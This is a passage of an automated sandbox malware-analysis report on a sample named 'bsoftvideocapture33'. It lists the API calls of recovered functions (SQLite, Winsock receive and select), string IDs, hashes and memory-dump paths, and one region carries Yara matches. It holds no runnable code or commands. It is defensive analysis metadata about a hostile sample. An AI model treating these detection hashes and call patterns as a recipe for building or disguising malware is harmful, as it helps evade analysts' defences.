                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: 1e1c7f2846b16a3630420923a6a48155b588e62f00cc6ce9fa83f754fa02cfae
                                                                                                                                        • Instruction ID: bba80c19b1270acc65556cb8af1813a3b501cb7fa4e080d2dd6f243447d78fc3
                                                                                                                                        • Opcode Fuzzy Hash: 1e1c7f2846b16a3630420923a6a48155b588e62f00cc6ce9fa83f754fa02cfae
                                                                                                                                        • Instruction Fuzzy Hash: 52C092B0D48104EFFB008FD4DD44B6CBAB4BB04700F110037AC02F2280C7781849AA2A
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmpi
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1586166983-0
                                                                                                                                        • Opcode ID: 4346ebdee89d9faa911cc82a9771f13409ce828f895b56b42392439f32d4e5df
                                                                                                                                        • Instruction ID: f56b3db97d84ebd38c7da519d596240dac341679ee895763df0c0ccb291ca25a
                                                                                                                                        • Opcode Fuzzy Hash: 4346ebdee89d9faa911cc82a9771f13409ce828f895b56b42392439f32d4e5df
                                                                                                                                        • Instruction Fuzzy Hash: 719002206042019AE2000A316B4CA153654654464131944395947F0494DA788049651D
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_malloc.SQLITE3 ref: 609674C6
                                                                                                                                          • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                                                                          • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                                                                          • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                                                                          • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                                                                        • sqlite3_step.SQLITE3 ref: 6096755A
                                                                                                                                        • sqlite3_malloc.SQLITE3 ref: 6096783A
                                                                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 609678A8
                                                                                                                                        • sqlite3_column_bytes.SQLITE3 ref: 609678E8
                                                                                                                                        • sqlite3_column_blob.SQLITE3 ref: 60967901
                                                                                                                                        • sqlite3_column_int64.SQLITE3 ref: 6096791A
                                                                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60967931
                                                                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60967950
                                                                                                                                        • sqlite3_step.SQLITE3 ref: 609679C3
                                                                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 60967AA9
                                                                                                                                        • sqlite3_step.SQLITE3 ref: 60967AB4
                                                                                                                                        • sqlite3_column_int.SQLITE3 ref: 60967AC7
                                                                                                                                        • sqlite3_reset.SQLITE3 ref: 60967AD4
                                                                                                                                        • sqlite3_bind_int.SQLITE3 ref: 60967B89
                                                                                                                                        • sqlite3_step.SQLITE3 ref: 60967B94
                                                                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60967BB0
                                                                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60967BCF
                                                                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60967BE6
                                                                                                                                        • sqlite3_column_bytes.SQLITE3 ref: 60967C05
                                                                                                                                        • sqlite3_column_blob.SQLITE3 ref: 60967C1E
                                                                                                                                          • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
                                                                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 60967C72
                                                                                                                                        • sqlite3_step.SQLITE3 ref: 60967C7D
                                                                                                                                        • memcmp.MSVCRT ref: 60967D4C
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 60967D69
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 60967D74
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 60967FF7
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 60968002
                                                                                                                                          • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                                                                          • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                                                                          • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                                                                          • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                                                                          • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                                                                                                        • sqlite3_reset.SQLITE3 ref: 60967C93
                                                                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                                                                        • sqlite3_reset.SQLITE3 ref: 60967CA7
                                                                                                                                        • sqlite3_reset.SQLITE3 ref: 60968035
                                                                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 60967B72
                                                                                                                                          • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6096809D
                                                                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 609680C6
                                                                                                                                        • sqlite3_step.SQLITE3 ref: 609680D1
                                                                                                                                        • sqlite3_column_int.SQLITE3 ref: 609680F3
                                                                                                                                        • sqlite3_reset.SQLITE3 ref: 60968104
                                                                                                                                        • sqlite3_step.SQLITE3 ref: 60968139
                                                                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60968151
                                                                                                                                        • sqlite3_reset.SQLITE3 ref: 6096818A
                                                                                                                                          • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
                                                                                                                                          • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
                                                                                                                                        • sqlite3_reset.SQLITE3 ref: 609679E9
                                                                                                                                          • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
                                                                                                                                        • sqlite3_column_bytes.SQLITE3 ref: 60967587
                                                                                                                                          • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
                                                                                                                                        • sqlite3_column_blob.SQLITE3 ref: 60967572
                                                                                                                                          • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
                                                                                                                                        • sqlite3_reset.SQLITE3 ref: 609675B7
                                                                                                                                        • sqlite3_bind_int.SQLITE3 ref: 60967641
                                                                                                                                        • sqlite3_step.SQLITE3 ref: 6096764C
                                                                                                                                        • sqlite3_column_int64.SQLITE3 ref: 6096766E
                                                                                                                                        • sqlite3_reset.SQLITE3 ref: 6096768B
                                                                                                                                        • sqlite3_bind_int.SQLITE3 ref: 6096754F
                                                                                                                                          • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                                                                        • sqlite3_bind_int.SQLITE3 ref: 609690B2
                                                                                                                                        • sqlite3_bind_blob.SQLITE3 ref: 609690DB
                                                                                                                                        • sqlite3_step.SQLITE3 ref: 609690E6
                                                                                                                                        • sqlite3_reset.SQLITE3 ref: 609690F1
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 60969102
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 6096910D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
                                                                                                                                        • String ID: $d
                                                                                                                                        • API String ID: 2451604321-2084297493
                                                                                                                                        • Opcode ID: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                                                                                        • Instruction ID: 6b7ea73e19bc996eb6a422b8fcf26663d3cb25e4dd91ceba81a4d6a678ae72ab
                                                                                                                                        • Opcode Fuzzy Hash: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                                                                                        • Instruction Fuzzy Hash: 2CF2CF74A152288FDB54CF68C980B9EBBF2BF69304F1185A9E888A7341D774ED85CF41
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_finalize.SQLITE3 ref: 60966178
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 60966183
                                                                                                                                        • sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
                                                                                                                                        • sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
                                                                                                                                        • sqlite3_value_text.SQLITE3 ref: 60966236
                                                                                                                                        • sqlite3_value_int.SQLITE3 ref: 60966274
                                                                                                                                        • memcmp.MSVCRT ref: 6096639E
                                                                                                                                          • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
                                                                                                                                          • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
                                                                                                                                        • sqlite3_mprintf.SQLITE3 ref: 60966B51
                                                                                                                                        • sqlite3_mprintf.SQLITE3 ref: 60966B7D
                                                                                                                                          • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                                                                          • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
                                                                                                                                        • String ID: ASC$DESC$x
                                                                                                                                        • API String ID: 4082667235-1162196452
                                                                                                                                        • Opcode ID: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                                                                        • Instruction ID: 01f4316cc9c65235d83944c747b96ccca9397e1276bdc6c450b31a73d7ca280a
                                                                                                                                        • Opcode Fuzzy Hash: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                                                                        • Instruction Fuzzy Hash: AD921274A14319CFEB10CFA9C99079DBBB6BF69304F20816AD858AB342D774E985CF41
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
                                                                                                                                        • sqlite3_step.SQLITE3(?,?), ref: 609693B0
                                                                                                                                        • sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
                                                                                                                                          • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                                                                          • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                                                                          • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                                                                          • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                                                                        • sqlite3_reset.SQLITE3(?,?), ref: 609693F3
                                                                                                                                        • sqlite3_malloc.SQLITE3(?), ref: 60969561
                                                                                                                                        • sqlite3_malloc.SQLITE3(?), ref: 6096958D
                                                                                                                                        • sqlite3_step.SQLITE3(?), ref: 609695D2
                                                                                                                                        • sqlite3_column_int64.SQLITE3(?), ref: 609695EA
                                                                                                                                        • sqlite3_reset.SQLITE3(?), ref: 60969604
                                                                                                                                        • sqlite3_realloc.SQLITE3(?), ref: 609697D0
                                                                                                                                        • sqlite3_realloc.SQLITE3(?), ref: 609698A9
                                                                                                                                          • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
                                                                                                                                        • sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
                                                                                                                                        • sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
                                                                                                                                          • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                                                        • sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
                                                                                                                                        • sqlite3_step.SQLITE3(?,?), ref: 60969A75
                                                                                                                                        • sqlite3_reset.SQLITE3(?,?), ref: 60969A80
                                                                                                                                        • sqlite3_free.SQLITE3(?), ref: 60969D41
                                                                                                                                        • sqlite3_free.SQLITE3(?), ref: 60969D4C
                                                                                                                                        • sqlite3_free.SQLITE3(?), ref: 60969D5B
                                                                                                                                          • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                                                                          • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                                                                          • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 961572588-0
                                                                                                                                        • Opcode ID: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                                                                        • Instruction ID: dba6eef834311e7f80380fc62c490a647dd1765b4da9a7e0a506f520bf28697a
                                                                                                                                        • Opcode Fuzzy Hash: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                                                                        • Instruction Fuzzy Hash: 9872F275A042298FDB24CF69C88078DB7F6FF98314F1586A9D889AB341D774AD81CF81
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
                                                                                                                                        • String ID: 2$foreign key$indexed
                                                                                                                                        • API String ID: 4126863092-702264400
                                                                                                                                        • Opcode ID: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                                                                        • Instruction ID: 3d5d194cd292e354de8359ea213fef7e5121ae3f60f7d2d7ba557b44893e8b9c
                                                                                                                                        • Opcode Fuzzy Hash: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                                                                        • Instruction Fuzzy Hash: 6BE1B374A142099FDB04CFA8D590A9DBBF2BFA9304F21C129E855AB754DB35ED82CF40
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_stricmp
                                                                                                                                        • String ID: USING COVERING INDEX $DISTINCT$ORDER BY
                                                                                                                                        • API String ID: 912767213-1308749736
                                                                                                                                        • Opcode ID: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                                                                        • Instruction ID: 4f43644a9add5c5df618cbd47cd61ce2203d262f2077f605e752fe25420d36ab
                                                                                                                                        • Opcode Fuzzy Hash: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                                                                        • Instruction Fuzzy Hash: 2412D674A08268CFDB25DF28C880B5AB7B3AFA9314F1085E9E8899B355D774DD81CF41
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6094B488
                                                                                                                                        • sqlite3_step.SQLITE3 ref: 6094B496
                                                                                                                                        • sqlite3_reset.SQLITE3 ref: 6094B4A4
                                                                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
                                                                                                                                        • sqlite3_step.SQLITE3 ref: 6094B4E0
                                                                                                                                        • sqlite3_reset.SQLITE3 ref: 6094B4EE
                                                                                                                                          • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4082478743-0
                                                                                                                                        • Opcode ID: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                                                                                        • Instruction ID: 9e7f29540a3c6f2d28ce6b101cd1a975f5529a8f599b89b7128c34d749e8d9ce
                                                                                                                                        • Opcode Fuzzy Hash: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                                                                                        • Instruction Fuzzy Hash: DD41D2B4A087018FCB50DF69C484A9EB7F6EFA8364F158929EC99CB315E734E8418F51
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02C08ADE: __EH_prolog.LIBCMT ref: 02C08AE3
                                                                                                                                          • Part of subcall function 02C08ADE: _Allocate.LIBCPMT ref: 02C08B3A
                                                                                                                                          • Part of subcall function 02C08ADE: _memmove.LIBCMT ref: 02C08B91
                                                                                                                                        • _memset.LIBCMT ref: 02C0F949
                                                                                                                                        • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02C0F9B2
                                                                                                                                        • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02C0F9BA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                                                                                                        • String ID: Unknown error$invalid string position
                                                                                                                                        • API String ID: 1854462395-1837348584
                                                                                                                                        • Opcode ID: 33104b9dc6c31c4b7b6f6936c97a3f2a51693e6f3afcf76f7defabedfd7cedce
                                                                                                                                        • Instruction ID: da31562bfe1119e62d8f7ebac1cf7e2c139fc07ed6f8236c01b4137680ad8ab4
                                                                                                                                        • Opcode Fuzzy Hash: 33104b9dc6c31c4b7b6f6936c97a3f2a51693e6f3afcf76f7defabedfd7cedce
                                                                                                                                        • Instruction Fuzzy Hash: 1851CF706483419FE724CF25C890B2EBBE4AB88344F50492DE482976E1DB71E588CB96
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6094D354
                                                                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6094D546
                                                                                                                                          • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
                                                                                                                                          • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
                                                                                                                                          • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
                                                                                                                                        • sqlite3_stricmp.SQLITE3 ref: 6094D3DA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                                                        • String ID: BINARY$INTEGER
                                                                                                                                        • API String ID: 317512412-1676293250
                                                                                                                                        • Opcode ID: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                                                                        • Instruction ID: cace79839434994537c0410bddb438ad3d501bddbf1b20fcc6a8a8bdb5da7fdd
                                                                                                                                        • Opcode Fuzzy Hash: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                                                                        • Instruction Fuzzy Hash: 8E712978A056099BDB05CF69C49079EBBF2BFA8308F11C529EC55AB3A4D734E941CF80
                                                                                                                                        APIs
                                                                                                                                        • WSASetLastError.WS2_32(00000000), ref: 02C02BE4
                                                                                                                                        • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02C02C07
                                                                                                                                          • Part of subcall function 02C0950E: WSAGetLastError.WS2_32(00000000,?,?,02C02A51), ref: 02C0951C
                                                                                                                                        • WSASetLastError.WS2_32 ref: 02C02CD3
                                                                                                                                        • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02C02CE7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$Recvselect
                                                                                                                                        • String ID: 3'
                                                                                                                                        • API String ID: 886190287-280543908
                                                                                                                                        • Opcode ID: b31c6cafc72698fd3736fc190cc8597c22b1c2694dd2403112477d72665c6064
                                                                                                                                        • Instruction ID: d542271f8437d55f558a863190bb333446e29849950f0e1acae68555f4cd70c0
                                                                                                                                        • Opcode Fuzzy Hash: b31c6cafc72698fd3736fc190cc8597c22b1c2694dd2403112477d72665c6064
                                                                                                                                        • Instruction Fuzzy Hash: 9C416BB19083019FD720AF74C89876BBBE9AF84754F10491EE999C76C0EB70D944DF92
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6093F443
                                                                                                                                          • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6093F45C
                                                                                                                                          • Part of subcall function 60939559: memcmp.MSVCRT ref: 60939694
                                                                                                                                          • Part of subcall function 60939559: memcmp.MSVCRT ref: 609396CA
